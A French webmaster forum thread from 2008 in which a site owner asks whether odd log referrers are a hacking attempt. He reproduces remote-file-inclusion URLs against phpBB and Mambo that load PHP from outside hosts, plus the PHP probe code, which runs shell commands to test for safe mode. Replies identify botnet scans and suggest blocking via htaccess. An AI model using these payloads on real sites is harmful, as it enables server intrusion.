Formation Google AnalyticsSavez-vous bien utiliser les outils de mesure d'audience ?
Effectuez-vous un calcul de ROI (Retour sur investissement) pour savoir comment améliorer vos campagnes emarketing ?
Savez-vous utiliser les bons outils pour booster votre taux de transformation ?
La formation Web Analytics de Ranking Metrics, présentée par un expert reconnu officiellement par Google Analytics, vous apportera les réponses à toutes vos questions !
===> Informations et inscriptions.

Tentative de piratage ?
Poster un nouveau sujet Imprimer cette discussion    Forum -> Développement d'un site Web   Les dernières discussions de ce forum sont disponibles au format RSS
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
 
Mountain Magazin
WRInaute occasionnel
WRInaute occasionnel

Inscrit le: 01 Oct 2004
Messages: 156
Localisation: Grenoble
URL permanente de ce messagePosté le : Dim Jan 20, 2008 0:36    Sujet du message: Tentative de piratage ?
Bonjour,

Depuis ce matin, j'ai des référents bizarres dans mes stats :
MONDOMAINE//?name=PNphpBB2&file=viewtopic&t=8//viewtopic.php?p=15&highlight=%2527.include($_GET[a]),exit.%2527&a=http://dj4you.ch/vsd/test.txt???

le code du fichier :
Code:

<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;




Ou encore comme référent MON DOMAINE/?mosConfig_absolute_path=http://www.vfcuse.hu/test.txt?

Le code du fichier :
Code:

<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
   $contrs=0;
}
else{
   ini_restore("safe_mode");
   ini_restore("open_basedir");
   if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
      $contrs=0;
   }else{
      $contrs=1;
   }
}

if($contrs == 0){
   echo("SAFEMODEOFF");
}else{
   echo("SAFEMODEON");
}

function ex($cfe){
   $res = '';
   if (!empty($cfe)){
      if(function_exists('exec')){
         @exec($cfe,$res);
         $res = join("\n",$res);
      }
      elseif(function_exists('shell_exec')){
         $res = @shell_exec($cfe);
      }
      elseif(function_exists('system')){
         @ob_start();
         @system($cfe);
         $res = @ob_get_contents();
         @ob_end_clean();
      }
      elseif(function_exists('passthru')){
         @ob_start();
         @passthru($cfe);
         $res = @ob_get_contents();
         @ob_end_clean();
      }
      elseif(@is_resource($f = @popen($cfe,"r"))){
         $res = "";
         while(!@feof($f)) { $res .= @fread($f,1024); }
         @pclose($f);
      }
   }
   return $res;
}

exit(0);



Qu'en pensez vous ?

Tentative de piratage on dirait. Du sérieux ou pas ?

Merci
 
Mountain Magazin Visiter le site web du posteur
Dan_A
WRInaute occasionnel
WRInaute occasionnel

Inscrit le: 21 Déc 2005
Messages: 158
URL permanente de ce messagePosté le : Dim Jan 20, 2008 10:50    Sujet du message: Tentative de piratage ?
Pas de chance, ce sont des attaques de zombies à la recherche de failles connues de CMS, le but étant d'infecter le site pour ajouter de nouveaux zombies à un des nombreux botnets en activité.
 
Dan_A
Mountain Magazin
WRInaute occasionnel
WRInaute occasionnel

Inscrit le: 01 Oct 2004
Messages: 156
Localisation: Grenoble
URL permanente de ce messagePosté le : Dim Jan 20, 2008 11:47    Sujet du message: Tentative de piratage ?
Ok, merci, ça me semblais pas catholique.

Existe-t-il un moyen de lutter ?

Merci de vos réponses.
 
Mountain Magazin Visiter le site web du posteur
Leonick
WRInaute accro
WRInaute accro

Inscrit le: 08 Aoû 2004
Messages: 9061
Localisation: Val de Marne
URL permanente de ce messagePosté le : Dim Jan 20, 2008 11:58    Sujet du message: Tentative de piratage ?
la 1° chose étant de bloquer les url contenant http:// dans le contenu du request_uri grâce au htaccess, après, selon le contenu de ton site, tu pourras bloquer les répertoires admin, ...
 
Leonick Visiter le site web du posteur
Mountain Magazin
WRInaute occasionnel
WRInaute occasionnel

Inscrit le: 01 Oct 2004
Messages: 156
Localisation: Grenoble
URL permanente de ce messagePosté le : Dim Jan 20, 2008 16:16    Sujet du message: Tentative de piratage ?
Ok, mais comment tu fais ?

Je maîtrise bien l'URL rewriting, mais là je vois pas trop comment faire.

Merci
 
Mountain Magazin Visiter le site web du posteur
 
Montrer les messages depuis:   
Revenir en haut    Forum -> Développement d'un site Web Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1 - 
Connexion
Nom d'utilisateur:    Mot de passe:      Se connecter automatiquement à chaque visite    

CLIQUEZ ICI pour vous inscrire à WebRankInfo (forum, annuaire, outils...)

Connexion

© 2001-2005 phpBB Group, support français
Personnalisation : WebRankInfo ™

 ODP  Firefox  Alsacreations  annuaire webmaster Yagoort